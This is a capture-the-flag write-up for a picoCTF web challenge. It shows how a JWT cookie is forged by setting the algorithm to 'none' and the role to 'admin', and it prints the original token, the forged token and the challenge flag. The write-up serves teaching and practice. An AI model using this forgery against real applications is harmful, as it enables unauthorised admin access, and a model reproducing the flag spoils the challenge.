--- ### Challenge Description Most web application developers use third party components without testing their security. Can you identify the components and exploit the vulnerable one? The website is running at http://saturn.picoctf.net:52680/. Can you become an `admin`? You can login as `test` with the password `Test123!` to get started. --- ### Summary This CTF challenge exposes a vulnerability in JWT authentication where the signing algorithm is set to none, allowing for the use of unsigned tokens. By modifying the token to grant themselves "admin" privileges, the attacker can authenticate as an administrator and capture the flag. --- ### Enumerate the Webpage Here's the homepage: ![[images/Pasted image 20230830163236.png]] <p style="text-align:center;"><i>Figure 1- Login page for "Our Bank"</i></p> The challenge description says we can login with `test:Test123!`, so I log in with those credentials and get the following page: ![[images/Pasted image 20230830163258.png]] <p style="text-align:center;"><i>Figure 2: Landing page for "Our Bank"</i></p> Let's inspect the website's cookies: ![[images/Pasted image 20230902131806.png]]``` ``` eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJhdXRoIjoxNjkyNjQyMjc3NTc1LCJhZ2VudCI6Ik1vemlsbGEvNS4wIChXaW5kb3dzIE5UIDEwLjA7IFdpbjY0OyB4NjQ7IHJ2OjEwOS4wKSBHZWNrby8yMDEwMDEwMSBGaXJlZm94LzExNi4wIiwicm9sZSI6InVzZXIiLCJpYXQiOjE2OTI2NDIyNzh9.c11JfHx8fdsgrwb8nK6Sf-HI3UJ-DgEiKHjNtHj3eF8 ``` <p style="text-align:center;"><i>Figure 3-4: Token cookie from "Our Bank"</i></p> This looks like a JSON Web Token; let's decode it and view its contents: ![[images/Pasted image 20230902133330.png]] <p style="text-align:center;"> <i>Figure 5: Decoded <a href='https://token.dev/'> JSON Web Token</a></i> </p> JWT's are commonly used for secure website authentication. However, depending on the developers implementation, there can be severe vulnerabilities. --- ### Exploit the JWT Sometimes, JWT's can be left unsigned by changing the `alg` to `none`. This allows an attacker to modify a JWT token without knowledge of the key used to sign it. The goal of the challenge is to log in as `admin`, so lets change the role to `admin`, and change the alg to `none`: ![[images/Pasted image 20230902133422.png]] ``` eyJ0eXAiOiJKV1QiLCJhbGciOiJub25lIn0.eyJhdXRoIjoxNjkyNjQyMjc3NTc1LCJhZ2VudCI6Ik1vemlsbGEvNS4wIChXaW5kb3dzIE5UIDEwLjA7IFdpbjY0OyB4NjQ7IHJ2OjEwOS4wKSBHZWNrby8yMDEwMDEwMSBGaXJlZm94LzExNi4wIiwicm9sZSI6ImFkbWluIiwiaWF0IjoxNjkyNjQyMjc4fQ. ``` <p style="text-align:center;"><i>Figure 6-7: Modified the JWT to authenticate as the admin user </i></p> Note that the JWT must end with a period, or the token will fail to authenticate. Modify the `token` cookie with our newly crafted JWT: ![[images/Pasted image 20230902133502.png]] <p style="text-align:center;"><i>Figure 8: Updated the cookie to use our modified JWT</i></p> Reloading the page authenticates you as an admin: ![[images/Pasted image 20230902133612.png]] <p style="text-align:center;"><i>Figure 8: Authenticated as the admin user</i></p> Flag: `picoCTF{succ3ss_@u7h3nt1c@710n_3444eacf}`